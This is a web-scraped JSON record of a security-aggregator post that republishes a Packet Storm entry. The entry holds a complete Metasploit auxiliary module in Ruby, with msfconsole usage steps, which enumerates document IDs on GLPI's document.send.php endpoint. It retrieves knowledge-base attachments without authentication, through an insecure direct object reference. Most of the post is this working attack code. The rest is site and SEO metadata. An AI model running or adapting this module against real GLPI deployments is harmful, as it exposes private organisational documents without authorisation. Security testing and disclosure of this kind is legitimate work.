{"id":42056,"date":"2026-02-20T17:46:41","date_gmt":"2026-02-20T17:46:41","guid":{"rendered":"http:\/\/localhost\/?p=42056"},"modified":"2026-02-20T17:46:41","modified_gmt":"2026-02-20T17:46:41","slug":"glpi-accessible-documents-insecure-direct-object-reference","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=42056","title":{"rendered":"\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953"},"content":{"rendered":"

{“lastseen”:”2026-02-20T23:02:06″,”description”:”This Metasploit auxiliary module scans a GLPI installation for improperly exposed documents linked to KnowbaseItem objects via the document.send.php endpoint. The module performs an automated enumeration of docid values within a defined range and…”,”published”:”2026-02-20T00:00:00″,”modified”:”2026-02-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference”,”source”:””,”references”:””,”id”:”PACKETSTORM:215953″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : GLPI Accessible Documents IDOR Scanner \u2013 Metasploit Auxiliary Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.glpi-project.org\/en\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : This Metasploit auxiliary module scans a GLPI installation for improperly exposed documents linked to KnowbaseItem objects via the document.send.php endpoint.\\n The module performs an automated enumeration of docid values within a defined range and attempts to access documents without authentication. \\n \\t\\t\\t\\t If the server responds with HTTP 200 and a non-HTML content type (e.g., PDF, image, ZIP, etc.), the module flags it as a potential Insecure Direct Object Reference (IDOR) vulnerability.\\n \\n [+] The scanner:\\n \\n Iterates over a configurable docid range\\n \\n Targets KnowbaseItem document associations\\n \\n Validates responses based on allowed content types\\n \\n Reports accessible documents that may indicate improper access control\\n \\n This module is intended for authorized security testing to identify access control misconfigurations in GLPI deployments.\\n \\n [+] POC : \\n \\n modules\/auxiliary\/scanner\/http\/glpi_doc_idor.rb\\n \\n msfconsole\\n msf \\u003e reload_all\\n \\n use auxiliary\/scanner\/http\/glpi_doc_idor\\n set RHOST 10.0.0.1\\n set RPORT 80\\n set TARGETURI \/\\n set ITEMS_ID 123\\n set DOCID_START 1\\n set DOCID_END 100\\n run\\n \\n \\n \\n ##\\n # This module requires Metasploit Framework\\n # Tested with Metasploit 6.x\\n ##\\n \\n require ‘msf\/core’\\n require ‘uri’\\n require ‘net\/http’\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n \\n def initialize(info = {})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘GLPI Accessible Documents IDOR Scanner’,\\n ‘Description’ =\\u003e %q{\\n Scans a GLPI installation for accessible KnowbaseItem documents without authentication.\\n This checks for possible IDOR vulnerabilities by iterating docid values.\\n },\\n ‘Author’ =\\u003e [‘Indoushka’],\\n ‘License’ =\\u003e MSF_LICENSE\\n ))\\n \\n register_options(\\n [\\n Opt::RHOST(),\\n Opt::RPORT(80),\\n OptString.new(‘TARGETURI’, [true, \\”Base path of GLPI\\”, ‘\/’]),\\n OptInt.new(‘ITEMS_ID’, [true, \\”Items ID to test\\”, 1]),\\n OptInt.new(‘DOCID_START’, [true, \\”Starting docid\\”, 1]),\\n OptInt.new(‘DOCID_END’, [true, \\”Ending docid\\”, 100])\\n ]\\n )\\n \\n register_advanced_options(\\n [\\n OptBool.new(‘SSL’, [true, \\”Use SSL\\”, false])\\n ]\\n )\\n end\\n \\n def check_content_type(resp)\\n return false if resp.nil? || resp[‘Content-Type’].nil?\\n ct = resp[‘Content-Type’].downcase\\n allowed = [\\”image\/\\”, \\”application\/pdf\\”, \\”application\/xml\\”, \\”text\/xml\\”, \\”text\/csv\\”,\\n \\”application\/zip\\”, \\”application\/x-rar-compressed\\”, \\”application\/x-gzip\\”,\\n \\”audio\/\\”, \\”video\/\\”, \\”application\/postscript\\”, \\”image\/svg+xml\\”,\\n \\”application\/x-shockwave-flash\\”, \\”application\/x-tar\\”, \\”application\/x-bzip2\\”,\\n \\”application\/x-7z-compressed\\”, \\”application\/vnd.ms-excel\\”, \\”application\/msword\\”]\\n allowed.any? { |sub| ct.include?(sub) } \\u0026\\u0026 !ct.include?(\\”text\/html\\”)\\n end\\n \\n def run\\n start_id = datastore[‘DOCID_START’]\\n end_id = datastore[‘DOCID_END’]\\n items_id = datastore[‘ITEMS_ID’]\\n base_uri = normalize_uri(datastore[‘TARGETURI’])\\n use_ssl = datastore[‘SSL’]\\n \\n (start_id..end_id).each do |docid|\\n target_url = \\”#{base_uri}\/front\/document.send.php?docid=#{docid}\\u0026itemtype=KnowbaseItem\\u0026items_id=#{items_id}\\”\\n \\n begin\\n res = send_request_cgi({\\n ‘uri’ =\\u003e target_url,\\n ‘method’ =\\u003e ‘GET’,\\n ‘headers’ =\\u003e {\\n ‘User-Agent’ =\\u003e ‘Mozilla\/5.0 (compatible; GLPI-Doc-Checker\/1.1)’\\n }\\n })\\n \\n next if res.nil?\\n \\n if res.code == 200 \\u0026\\u0026 check_content_type(res)\\n print_good(\\”#{rhost}:#{rport}#{target_url} -\\u003e #{res[‘Content-Type’]} – vulnerability found\\”)\\n elsif framework.debug?\\n print_status(\\”Skipped #{target_url} -\\u003e #{res.code} -\\u003e #{res[‘Content-Type’]}\\”)\\n end\\n \\n rescue ::Rex::ConnectionError =\\u003e e\\n print_error(\\”Connection error: #{e}\\”)\\n end\\n end\\n end\\n end\\n \\n \\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215953″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215953\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-20T23:02:06″,”description”:”This Metasploit auxiliary module scans a GLPI installation for improperly exposed documents linked to KnowbaseItem objects via the document.send.php endpoint. The module performs an automated…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-42056","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=42056\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-20T23:02:06″,”description”:”This Metasploit auxiliary module scans a GLPI installation for improperly exposed documents linked to KnowbaseItem objects via the document.send.php endpoint. The module performs an automated...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=42056\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-20T17:46:41+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42056#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42056\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953\",\"datePublished\":\"2026-02-20T17:46:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42056\"},\"wordCount\":801,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=42056#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42056\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42056\",\"name\":\"\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-20T17:46:41+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42056#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=42056\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=42056#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=42056","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953 - zero redgem","og_description":"{“lastseen”:”2026-02-20T23:02:06″,”description”:”This Metasploit auxiliary module scans a GLPI installation for improperly exposed documents linked to KnowbaseItem objects via the document.send.php endpoint. The module performs an automated...","og_url":"https:\/\/zero.redgem.net\/?p=42056","og_site_name":"zero redgem","article_published_time":"2026-02-20T17:46:41+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=42056#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=42056"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953","datePublished":"2026-02-20T17:46:41+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=42056"},"wordCount":801,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=42056#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=42056","url":"https:\/\/zero.redgem.net\/?p=42056","name":"\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-20T17:46:41+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=42056#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=42056"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=42056#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 GLPI Accessible Documents Insecure Direct Object Reference_PACKETSTORM:215953"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/42056","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=42056"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/42056\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=42056"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=42056"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=42056"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}